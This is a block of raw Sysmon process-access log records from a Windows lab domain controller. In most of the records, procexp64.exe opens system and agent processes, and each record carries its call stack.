15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784614Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784613Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784612Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784611Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784610Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784609Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784608Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784607Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784606Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784605Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784604Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784603Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784602Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784601Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784600Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784599Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784598Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf8